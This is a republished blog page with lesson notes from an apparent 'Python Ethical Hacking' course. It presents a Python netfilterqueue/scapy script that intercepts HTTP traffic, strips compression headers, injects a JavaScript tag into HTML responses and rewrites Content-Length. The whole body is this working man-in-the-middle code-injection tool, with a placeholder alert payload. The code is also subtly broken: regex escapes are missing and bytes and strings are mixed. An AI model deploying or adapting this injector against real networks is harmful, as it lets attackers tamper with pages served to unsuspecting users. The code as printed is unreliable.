zoukankan html css js c++ java

Python Ethical Hacking

Recalculating Content-Length:

#!/usr/bin/env python
import re

from netfilterqueue import NetfilterQueue
from scapy.layers.inet import TCP, IP
from scapy.packet import Raw


def set_load(packet, load):
    packet[Raw].load = load
    del packet[IP].len
    del packet[IP].chksum
    del packet[TCP].chksum
    return packet


def process_packet(packet):
    scapy_packet = IP(packet.get_payload())
    # scapy_packet.show()
    if scapy_packet.haslayer(Raw):
        load = scapy_packet[Raw].load
        if scapy_packet[TCP].dport == 80:
            print("[+] Request")
            load = re.sub(b"Accept-Encoding:.*?\r\n", b"", load)
        elif scapy_packet[TCP].sport == 80:
            print("[+] Response")
            injection_code = b"<script>alert('test');</script>"
            load = load.replace(b"</body>", injection_code + b"</body>")
            content_length_search = re.search("(?:Content-Length:s)(d*)", load)
            if content_length_search and "text/html" in load:
                content_length = content_length_search.group(1)
                new_content_length = int(content_length) + len(injection_code)
                load = load.replace(content_length, str(new_content_length))

        if load != scapy_packet[Raw].load:
            new_packet = set_load(scapy_packet, load)
            packet.set_payload(str(new_packet).encode())

    packet.accept()


queue = NetfilterQueue()
queue.bind(0, process_packet)
try:
    queue.run()
except KeyboardInterrupt:
    print('')

相信未来 - 该面对的绝不逃避，该执著的永不怨悔，该舍弃的不再留念，该珍惜的好好把握。

查看全文

相关阅读:
Java 位运算符和移位运算符
 String类为什么是final
SVN server 安装并创建用户访问
 初学JavaScript正则表达式(十一)
初学JavaScript正则表达式(十)
初学JavaScript正则表达式(九)
初学JavaScript正则表达式(八)
初学JavaScript正则表达式(七)
初学JavaScript正则表达式(六)
初学JavaScript正则表达式(五)

原文地址：https://www.cnblogs.com/keepmoving1113/p/11517275.html